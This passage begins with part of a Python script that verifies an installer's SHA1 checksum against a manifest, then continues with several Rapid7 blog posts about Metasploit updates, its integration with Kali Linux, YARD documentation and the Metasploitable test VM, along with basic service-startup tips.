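        return False, f"{name} is not listed in the manifest"
    actual = sha1_of_file(path)
    if not hmac.compare_digest(actual, expected):
        return False, f"digest mismatch: expected {expected}, got {actual}"
    return True, "sha1 matches the manifest"


# Constructed stand-ins for the real installer bytes.
GOOD_CONTENT = b"constructed stand-in for the installer bytes\n"
BAD_CONTENT = b"constructed stand-in for a tampered installer\n"


def demo():
    """Exercise the three outcomes: genuine, tampered, and unlisted file."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        files = {
            "metasploit-installer.run": GOOD_CONTENT,
            "metasploit-installer-tampered.run": BAD_CONTENT,
            "other-file.run": GOOD_CONTENT,
        }
        for name, content in files.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(content)
        # The manifest stands in for the vendor's published SHA1SUMS; it lists
        # only the two installer names, both with the digest of the genuine bytes.
        good_digest = hashlib.sha1(GOOD_CONTENT).hexdigest()
        manifest = (
            f"{good_digest}  metasploit-installer.run\n"
            f"{good_digest} *metasploit-installer-tampered.run\n"
        )
        for name in files:
            results[name] = verify(os.path.join(d, name), manifest)
    return results


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{'OK  ' if ok else 'FAIL'} {name}: {reason}")
```

The manifest is only as trustworthy as where it came from, which is what the PGP signature is for: check the detached signature on the checksum file with gpg --verify against a key obtained separately from the download, and only then trust the digests in it. The script above does not perform that step.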

 

Kali Linux

This is the first update released after our integration with the new and improved Kali Linux. I'm super excited about supporting Kali for real as a Metasploit platform, with all the QA love that we give Ubuntu, Red Hat, and Windows. More interestingly, from a technical standpoint, Metasploit Framework, Community & Pro have all been built as Debian packages, so if this whole Kali thing works out, I'm cautiously optimistic about packaging in a similar way for similar platforms -- Ubuntu, Mint, Debian, and all the rest. That will be a glorious day indeed.

 

Hopefully, you had a chance to drop in on the March 21 webcast featuring HD Moore, Mati Aharoni, and Devon Kearns. If you didn't, no problem -- you can access the on-demand version here.

 

YARD

Finally, if you've been tracking along the commit history, you will have noticed that we've been embracing YARD as a standard for decorating classes and methods in the core Metasploit library. So, if you'd like to get some up-to-date documentation on an API call that you find a little mysterious, you can try typing yard doc in the top level of your Metasploit Framework source checkout then click around doc/index.html with your favorite browser.

 

If you don't find the documentation that you're looking for at that point, then hey, feel free to write some! We will totally take a pull request of insightful documentation for our many APIs, and YARD doc syntax is pretty easy to get a handle on. Check the YARD Guides to get started.

 

New Modules

Here are this week's new modules. It's an even dozen for your pen-testing pleasure.

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.


This week our Whiteboard Wednesday topic is Metasploitable, our intentionally vulnerable virtual machine. Christian Kirsch from the Metasploit team would like to talk about the finer points of how to download, install, and use this free tool as a test lab to get familiar with Metasploit. A lot of our customers are hesitant to use Metasploit on production machines, so this tool gives you the ability to sharpen your exploit knives with no risk.

 

Watch the video here!

 

Let us know what you think, any other topics you'd like us to cover, or feel free to leave us a comment below.

 

See you next Wednesday!

-Patrick Hellen

Today, our friends at Offensive Security announced Kali Linux, which is based on the philosophy of an offensive approach to security. While defensive solutions are important to protect your network, it is critical to step into the shoes of an attacker to see if they're working. Kali Linux is a security auditing toolkit that enables you to do just that: test the security of your network defenses before others do.


Kali is a free, open source, and robust Linux Distribution that makes security auditing ready for the enterprise. It is the natural evolution of the BackTrack platform, which has been hugely popular among Metasploit users. This is why the Metasploit team here at Rapid7 was more than happy to join the Kali Linux project as an official contributor. We re-engineered Metasploit to fully integrate into the Kali Linux repositories and resolved some of the issues that may have caused some of you headaches with updates, databases, and general stability on BackTrack in the past.

 

To hear more about this topic, tune in to our free webcast with HD Moore (Metasploit Chief Architect), Mati Aharoni, and Devon Kearns (both from the BackTrack & Kali Linux team) on March 21 at 3pm Eastern.

 

If you can't wait that long, here's my short video to get an overview of Kali Linux:



 

If you'd like to start using Metasploit on Kali Linux, you may benefit from these tips:


  1. Download the Kali Linux Virtual Machine from www.kali.org, or install your own using instructions at http://docs.kali.org/general-use/install-vmware-tools-kali-guest
  2. Kali Linux doesn't start any application services by default to shorten the boot up time and reduce the attack surface to a minimum.
    1. To start Metasploit's services immediately, open a terminal window and enter service postgresql start && service metasploit start
    2. To start Metasploit's services on each boot (but not immediately), open a terminal window and enter update-rc.d postgresql enable && update-rc.d metasploit enable

  3. To start Metasploit Framework, open the menu Applications -> Kali Linux -> Top 10 Security Tools -> Metasploit Framework
  4. To start the web ui for Metasploit Community or Metasploit Pro, you have two options:
    1. Type the new go_pro command in the Metasploit Framework console (only available in Kali Linux for now), which starts all services and then launches the browser with http://localhost:3790, the URL of the Metasploit Community / Pro web-based user interface

    2. Open the menu Applications -> Kali Linux -> Exploitation Tools -> Metasploit -> metasploit community / pro

 

In case you have more questions, we have prepared an FAQ about Kali Linux and Metasploit.

 

I hope you'll enjoy using Metasploit Framework, Metasploit Community, and Metasploit Pro on Kali Linux. If you'd like to learn more about Kali Linux and Metasploit, attend our free webcast with HD Moore (Metasploit Chief Architect), Mati Aharoni, and Devon Kearns (both from the BackTrack & Kali Linux team) on March 21 at 3pm Eastern.
